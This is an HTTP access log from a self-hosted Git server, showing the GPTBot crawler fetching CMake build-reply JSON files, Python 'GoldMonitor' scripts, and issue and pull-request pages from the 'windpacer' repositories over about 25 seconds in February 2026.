"/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:18:25:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" +[17/Feb/2026:18:25:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" [Client 74.7.227.38] [Length 14819] [Gzip 5.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply" +[17/Feb/2026:18:25:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" [Client 74.7.227.38] [Length 14823] [Gzip 5.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply" +[17/Feb/2026:18:25:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:18:25:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:18:25:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 10783] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" +[17/Feb/2026:18:25:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 10780] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:18:25:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 11612] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply" +[17/Feb/2026:18:25:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 11616] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:25:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" [Client 74.7.227.38] [Length 14824] [Gzip 5.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply" +[17/Feb/2026:18:25:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 11616] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:25:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 10760] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" +[17/Feb/2026:18:25:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" [Client 74.7.227.38] [Length 2023] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" +[17/Feb/2026:18:25:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" [Client 74.7.227.38] [Length 2023] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" +[17/Feb/2026:18:25:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 11616] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:25:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" [Client 74.7.227.38] [Length 33256] [Gzip 10.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply" +[17/Feb/2026:18:25:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 11615] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:25:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 11611] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply" +[17/Feb/2026:18:25:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" +[17/Feb/2026:18:25:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:18:25:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:18:25:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:18:25:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" [Client 74.7.227.38] [Length 2023] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" +[17/Feb/2026:18:25:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" +[17/Feb/2026:18:25:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 10783] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" +[17/Feb/2026:18:25:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:18:25:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" [Client 74.7.227.38] [Length 20172] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" +[17/Feb/2026:18:25:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json?display=rendered" [Client 74.7.227.38] [Length 11156] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:18:25:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 10785] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" +[17/Feb/2026:18:25:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:18:25:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" +[17/Feb/2026:18:25:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" [Client 74.7.227.38] [Length 33300] [Gzip 10.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply" +[17/Feb/2026:18:25:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 10780] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:18:25:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 9984] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?milestone=-1&sort=latest&state=all&type=all" +[17/Feb/2026:18:25:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10176] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:18:25:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 9981] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?milestone=-1&state=open&type=all" +[17/Feb/2026:18:25:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10179] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:18:25:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V4.8.py?display=source" [Client 74.7.227.38] [Length 18225] [Gzip 5.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V4.8.py" +[17/Feb/2026:18:25:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v4.7.py?display=source" [Client 74.7.227.38] [Length 18811] [Gzip 5.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v4.7.py" +[17/Feb/2026:18:25:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.0.py?display=source" [Client 74.7.227.38] [Length 19615] [Gzip 6.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.0.py" +[17/Feb/2026:18:25:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.3.py?display=source" [Client 74.7.227.38] [Length 21573] [Gzip 7.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.3.py" +[17/Feb/2026:18:25:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.1.py?display=source" [Client 74.7.227.38] [Length 21127] [Gzip 6.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.1.py" +[17/Feb/2026:18:25:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" [Client 74.7.227.38] [Length 20172] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" +[17/Feb/2026:18:25:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.2.py?display=source" [Client 74.7.227.38] [Length 20998] [Gzip 6.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.2.py" +[17/Feb/2026:18:25:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10185] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:18:25:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10018] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:25:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr 